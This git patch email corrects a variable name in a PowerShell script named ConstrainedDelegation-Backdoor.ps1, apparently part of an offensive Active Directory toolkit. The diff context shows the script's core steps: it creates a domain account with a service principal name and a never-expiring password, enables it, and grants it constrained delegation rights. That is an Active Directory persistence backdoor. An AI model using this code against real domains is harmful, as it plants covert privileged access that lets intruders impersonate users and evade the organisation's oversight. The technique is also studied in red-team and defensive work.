From e8607d11ee91a9265bd0b7c61129fb47d5f7e569 Mon Sep 17 00:00:00 2001
From: Dliv3 <dlive@bupt.edu.cn>
Date: Mon, 12 Nov 2018 21:57:41 +0800
Subject: [PATCH] Bug Fix in ConstrainedDelegation-Backdoor

---
 Backdoors/ConstrainedDelegation-Backdoor.ps1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1
index 0d8ee0d..e9a07f1 100644
--- a/Backdoors/ConstrainedDelegation-Backdoor.ps1
+++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1
@@ -101,7 +101,7 @@ https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
         $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
         Write-Host "SamAccountName '$SamAccountName' already exists. Add 'msDS-AllowedToDelegateTo $AllowedToDelegateTo' to '$SamAccountName'."
     } Catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] {
-        New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$SPN" -AccountPassword (convertto-securestring "$Password" -asplaintext -force)  -PasswordNeverExpires $True  -PassThru | Enable-ADAccount
+        New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$ServicePrincipalName" -AccountPassword (convertto-securestring "$Password" -asplaintext -force)  -PasswordNeverExpires $True  -PassThru | Enable-ADAccount
         $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo"
     }
     Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @( "$AllowedToDelegateTo" ) }